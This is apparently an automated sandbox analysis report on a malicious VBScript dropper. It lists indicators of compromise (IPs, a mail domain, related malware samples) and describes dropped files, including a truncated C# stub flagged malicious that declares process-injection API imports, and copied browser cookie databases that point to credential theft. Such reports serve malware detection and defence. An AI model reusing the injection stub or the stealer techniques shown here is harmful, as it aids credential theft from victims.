Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:12:55	API Interceptor	38x Sleep call for process: powershell.exe modified
16:13:35	API Interceptor	2098x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
216.218.206.36	RFQ - Dosing Pumps Inquiry - elRawda & elRahamna 2,000 CMD Tender.exe	Get hash	malicious	Browse
	Eminencer.exe	Get hash	malicious	Browse
	RFQ-08-057-SAFETY SHOWER UNIT WITH COOLING SYSTEM.exe	Get hash	malicious	Browse
	NEW GIZA - INFRA - RFQ ( Pump ).exe	Get hash	malicious	Browse
	Request Order LLR-B-22-5681-A1.vbs	Get hash	malicious	Browse
	AWB DHL 7214306201 Shipment Notification.vbs	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.Injector.AOW.tr.16179.exe	Get hash	malicious	Browse
	Kukkenes.exe	Get hash	malicious	Browse
	RFQ OUR 20010_R00.vbs	Get hash	malicious	Browse
	PO-CBT-22-2157 MR-22-91143 Firefighter equipment.exe	Get hash	malicious	Browse
	#U2116 106 - Supply of Flex Connector for Diesel Engine Exhaust.vbs	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.Injector.AOW.tr.1425.exe	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.Injector.AOW.tr.22293.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mail.prgisi.com	RFQ - Dosing Pumps Inquiry - elRawda & elRahamna 2,000 CMD Tender.exe	Get hash	malicious	Browse	216.218.206.36
	Eminencer.exe	Get hash	malicious	Browse	216.218.206.36
	RFQ-08-057-SAFETY SHOWER UNIT WITH COOLING SYSTEM.exe	Get hash	malicious	Browse	216.218.206.36
	NEW GIZA - INFRA - RFQ ( Pump ).exe	Get hash	malicious	Browse	216.218.206.36
	Request Order LLR-B-22-5681-A1.vbs	Get hash	malicious	Browse	216.218.206.36
	AWB DHL 7214306201 Shipment Notification.vbs	Get hash	malicious	Browse	216.218.206.36
	SecuriteInfo.com.NSIS.Injector.AOW.tr.16179.exe	Get hash	malicious	Browse	216.218.206.36
	Kukkenes.exe	Get hash	malicious	Browse	216.218.206.36
	RFQ OUR 20010_R00.vbs	Get hash	malicious	Browse	216.218.206.36
	PO-CBT-22-2157 MR-22-91143 Firefighter equipment.exe	Get hash	malicious	Browse	216.218.206.36
	#U2116 106 - Supply of Flex Connector for Diesel Engine Exhaust.vbs	Get hash	malicious	Browse	216.218.206.36
	SecuriteInfo.com.NSIS.Injector.AOW.tr.1425.exe	Get hash	malicious	Browse	216.218.206.36
	SecuriteInfo.com.NSIS.Injector.AOW.tr.22293.exe	Get hash	malicious	Browse	216.218.206.36

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CENTRALUTAHUS	RFQ - Dosing Pumps Inquiry - elRawda & elRahamna 2,000 CMD Tender.exe	Get hash	malicious	Browse	216.218.206.36
	Eminencer.exe	Get hash	malicious	Browse	216.218.206.36
	RFQ-08-057-SAFETY SHOWER UNIT WITH COOLING SYSTEM.exe	Get hash	malicious	Browse	216.218.206.36
	NEW GIZA - INFRA - RFQ ( Pump ).exe	Get hash	malicious	Browse	216.218.206.36
	Request Order LLR-B-22-5681-A1.vbs	Get hash	malicious	Browse	216.218.206.36
	AWB DHL 7214306201 Shipment Notification.vbs	Get hash	malicious	Browse	216.218.206.36
	SecuriteInfo.com.NSIS.Injector.AOW.tr.16179.exe	Get hash	malicious	Browse	216.218.206.36
	Kukkenes.exe	Get hash	malicious	Browse	216.218.206.36
	RFQ OUR 20010_R00.vbs	Get hash	malicious	Browse	216.218.206.36
	PO-CBT-22-2157 MR-22-91143 Firefighter equipment.exe	Get hash	malicious	Browse	216.218.206.36
	#U2116 106 - Supply of Flex Connector for Diesel Engine Exhaust.vbs	Get hash	malicious	Browse	216.218.206.36
	SecuriteInfo.com.NSIS.Injector.AOW.tr.1425.exe	Get hash	malicious	Browse	216.218.206.36
	SecuriteInfo.com.NSIS.Injector.AOW.tr.22293.exe	Get hash	malicious	Browse	216.218.206.36
	botx.arm7	Get hash	malicious	Browse	74.82.45.118
	sora.arm	Get hash	malicious	Browse	216.218.253.220
	duG8veouwQ	Get hash	malicious	Browse	74.82.45.116
	xd.arm	Get hash	malicious	Browse	198.135.175.233
	Rvg3MFzKNR	Get hash	malicious	Browse	205.197.217.48
	SB5LaVg4V6	Get hash	malicious	Browse	64.77.248.235
	Edq2siYsn0	Get hash	malicious	Browse	205.197.217.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	https://kawanakajima.co.jp/collinesredshare666.htm	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	Scan_2022_10_03_14_53_13_366.PDF.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	quotation.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	PO-13466.vbs	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	ZA0o2SxyU8.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	http://onlinedesk2.matne.ru	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	VkDJ.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	TDM Consults Financing Draft.xlsx	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	https://expressinvoice.mijnparagon-cc.nl/	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	https://expressinvoice.mijnparagon-cc.nl/	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	rHwW5gS1cw.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	Victrex Payment.htm	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	rHwW5gS1cw.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	Victrex Payment.htm	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	malware.html	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	Re AWB DHL 7214306201 Shipment Notification.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	Cguzd7Qyfh.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	Order..dzk.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	RFQ - Dosing Pumps Inquiry - elRawda & elRahamna 2,000 CMD Tender.exe	Get hash	malicious	Browse	142.250.186.46 142.250.185.161
	https://arcamaxjobs.com/api/1/px?cid=18&cid2=5686&fid=xN7aBiNqMaeWzAkvLTeU&jpid=220&pcrlid=35d7f085-e7bd-40aa-8696-f8bfbee33487&px_c=48&px_ca=2022-09-27T16%3A32%3A00Z&px_ru=aHR0cHM6Ly9mcmVjdHQudG9wP2U9ZG1sdVkyVnVkQzV6WTJobGFXUmxaMmRsY2tCcGVHbHZiaTVqYUE9PQ==&px_sid=AMX367183374-1664285937-162638&px_tag=amj&px_tcaid=8&px_tcid=78&px_ty=3&q=Data+Entry+From+Home	Get hash	malicious	Browse	142.250.186.46 142.250.185.161

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.841989710132343
Encrypted:	false
SSDEEP:	192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
MD5:	677C4E3A07935751EA3B092A5E23232F
SHA1:	0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
SHA-256:	D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
SHA-512:	253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\RESA2B2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.987028301890633
Encrypted:	false
SSDEEP:	24:HMe9E2vqBsH4xwKPfwI+ycuZhNBakSPPNnqSqd:HqCJKPo1ulBa3NqSK
MD5:	52B4F8ED3B88EC328D89EF36A2050866
SHA1:	9EE5A85E073EFDEF69CDDA098C884C4E9A48EAF9
SHA-256:	AD16D4C2B70950D1D7EA3CB0F7F8611E8081A3BAD3B1832618ED42F45DC79436
SHA-512:	69865D18E3E7672D055292086418F27C006C3B7371392457E9C4431CB14DEF2C4848F0E9306C0B214323E3D0FD311800CD9A4C5C908DC09CFA46A2D7FAE677DC
Malicious:	false
Preview:	L.....:c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP...................{C.......e..........5.......C:\Users\user\AppData\Local\Temp\RESA2B2.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.5.x.x.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fo0nlcmw.oxc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfxogem4.yt2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1015556516706706
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Gak7YnqqPXPN5Dlq5J:+RI+ycuZhNBakSPPNnqX
MD5:	B3C8C491BB7B43D1E71ACCC2B0009B65
SHA1:	61E6838602DECE263E2D5093CBC0A06801A5AA07
SHA-256:	256C4D681B6AFDD18B49FEFADF98BD0A1860A51ACF4B4354B3A788735C194ECC
SHA-512:	8F7F6C97721DC51D8E11724117917A255AC7CAAD0927BA1427273B60C6E66EF0EEE516B69BA18A280554DDFB9840AA71EF1C139AB3054D9DC4C42F59BFBD2C4B
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.5.x.x.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.p.i.5.x.x.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	1089
Entropy (8bit):	5.044097082778121
Encrypted:	false
SSDEEP:	24:JjCMXN3JlPoPLYfRNw0OwR36oXNJFROCeFqtIQncWT/nb5:JjXJlPTJNw05RKEFRLSiIQnjb5
MD5:	BAB58B4D01CB9D487F337E778AEE3251
SHA1:	31A8838D16570110D902D50CE68210239C9BA9FE
SHA-256:	49CD9D4513029E668A3B44A42FDA9F9C47DF27B4ED47919B1E9453C1A8593AFF
SHA-512:	3419D32784F2283F7CB00DF297DD041494734B5624C2AD586A84627622CBA5614CA9DCB400878D0218EAB4C32124BC9E8D1BEB101515DB31A07BC32C00C86BDD
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;.public static class Cladogenet1.{[DllImport("user32")]public static extern int CreateMDIWindow(int Nvhie,int Hea,int hatch,int Pini,int Overi,int Recita,int Opkr,int Crock,int Autos,int Retr);.[DllImport("winmm.dll")]public static extern int GetDriverModuleHandle(int Dis40);.[DllImport("user32")]public static extern int IsDlgButtonChecked(int Lysku,int Sinis94);.[DllImport("ADVAPI32.DLL")]public static extern int DeleteService(int Arc);.[DllImport("user32")]public static extern int CreateCaret(int Pokie,int Sup,int Biova137,int Ikastl);.[DllImport("kernel32")]public static extern void RtlMoveMemory(IntPtr uvor1,ref Int32 uvor2,int uvor3);.[DllImport("user32")]public static extern int GetFocus();.[DllImport("user32", EntryPoint="EnumWindows")]public static extern IntPtr Vitrusa32(uint uvor5,int uvor6);.[DllImport("kernel32")]public static extern int SetThreadContext(int Nedfot,int Nong);.[DllImport("kernel32", EntryPoint="VirtualAll

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.250854508466307
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fB0zxs7+AEszICN23fQA:p37Lvkmb6KmeWZE7IA
MD5:	FDD27AC45608EBA2666D2901A917AF06
SHA1:	8426632E4346542E11C6F0035B20FB51E1F26BA0
SHA-256:	54E8795D1A22DE5BA1C12A468B4069DB0D58292ADA84EF13E251D45BAD26B7BA
SHA-512:	17A916DFA79639FEA32340939248457C498FEF280A8C8878968547D7E03146702AB81FC77428F74663FB964AF67C15BB1045E03F5BAFCC3777F4F1889C78501F
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs"

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.0861292849676416
Encrypted:	false
SSDEEP:	48:6JpU3puvMUCtvj9JLB89RsFj53v1ulBa3Nq:WopsMjh9v89RewDK
MD5:	CAF2E2625FE5AE7ABE705E341282D1E5
SHA1:	4C1624D47A948912F3A6E77D6F9C3EC15034C4E5
SHA-256:	C41D08B79E9ED69517624FA3592A86CDB598627B491441B990BC878DA2EEA43B
SHA-512:	E3DFAE1450A58728453743E2F765F2106AB7B7F7697BBB6715FA76B8AA36193F10C395ACABA23E5172FFF5A2659AEE9B8C6B4E88F530B8E9A4C6073C5A907007
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...`...#~......X...#Strings....$.......#US.,.......#GUID...<...t...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :............ J............ `............ s............ ..#.......... ..+.......... ..3.......... ..7.......... ............. ..#.................................

C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.320830639943674
Encrypted:	false
SSDEEP:	24:Aqd3ka6KmfE7I1Kax5DqBVKVrdFAMBJTH:Aika6PfE7I1K2DcVKdBJj
MD5:	5F00FCD4162B7D2A5D44965AFADBD389
SHA1:	9A20186161DC6AF8C175AB99B184769BB26A9A36
SHA-256:	C9DDD9F7B205EFA028C365700FDEC6705D14407DDE14FFF9206690DC23439585
SHA-512:	C999F90D1CA5620F6B63DDA02F12605FA19BF100C6567676C56B6708386E3C2B93E367D3907F44C4FC052D35981CBE67BCFFDDECC2A943FB38548195FECBEA71
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Chrome\Default\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	2.9216957692876595
Encrypted:	false
SSDEEP:	384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
MD5:	1A706D20E96086886B5D00D9698E09DF
SHA1:	DACF81D90647457585345BEDD6DE222E83FDE01F
SHA-256:	759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
SHA-512:	CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
Malicious:	false
Preview:	SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\5drowjrx.mtw\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.150359651157965
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	PUMP mt310143121.vbs
File size:	517402
MD5:	41ad96654d44ef375097eeeb83818cf7
SHA1:	20dae7bc9d6dc2c5f947de3f871d617fb36e6edc
SHA256:	28bf271ec1576c0e7d1b2a243de952bb70c25711cdc9c2d4494002a3e2f346ca
SHA512:	e0e756b9ccc37a1fee30ff1145bf9c3b28e441bfe7c1fa47face7afd4a4db6acdf6b8a346e5f6149ea085ad35648bd950e7e48c57f5fc61f14ec7bfe7d0156e2
SSDEEP:	6144:GYvp0UseCb/CHsE2Nydr8HSMB3567Fk2AhcAjI4PWTO:LpCbwq50ZAhLjVWC
TLSH:	19B4407B5423D0ACA7DEE2634C603EFD85D8F909C2E517AA223637C49913AFB5742E14
File Content Preview:	..'Heterogeneously46 UDTMTE GKKERIER Kinesertraadene EVECTIONS corrive Konfektens2 Aarsberetning Schoolteacherly SANDSTORMENE uvelkommen ..'Rimede210 Betydede229 embodier Dimeric221 Forebyggelsers Fornjelsessyges135 ..'hubristically ANTIHYPNOTIC KLANGLS B

File Icon


Icon Hash:	e8d69ece869a9ec4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 16:13:30.197988033 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.198057890 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.198353052 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.256292105 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.256309986 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.291635990 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.291856050 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.292381048 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.292687893 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.500511885 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.501226902 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:30.501494884 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.514873981 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:30.558656931 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.163913965 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.164235115 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.165873051 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.166030884 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.166107893 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166213989 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166265011 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166311979 CEST	443	49807	142.250.186.46	192.168.11.20
Oct 3, 2022 16:13:31.166323900 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.166584015 CEST	49807	443	192.168.11.20	142.250.186.46
Oct 3, 2022 16:13:31.355093956 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.355195045 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.355351925 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.355701923 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.355753899 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.409158945 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.409368992 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.409492970 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.411214113 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.411385059 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.411405087 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.414860964 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.414884090 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.415190935 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.415432930 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.415771008 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.458560944 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.667599916 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.667885065 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.667948008 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.668064117 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.668234110 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.668375969 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.668466091 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.668513060 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.669502974 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.669800043 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.670139074 CEST	443	49808	142.250.185.161	192.168.11.20
Oct 3, 2022 16:13:31.670422077 CEST	49808	443	192.168.11.20	142.250.185.161
Oct 3, 2022 16:13:31.670478106 CEST	443	49808	142.250.185.161	192.168.11.20
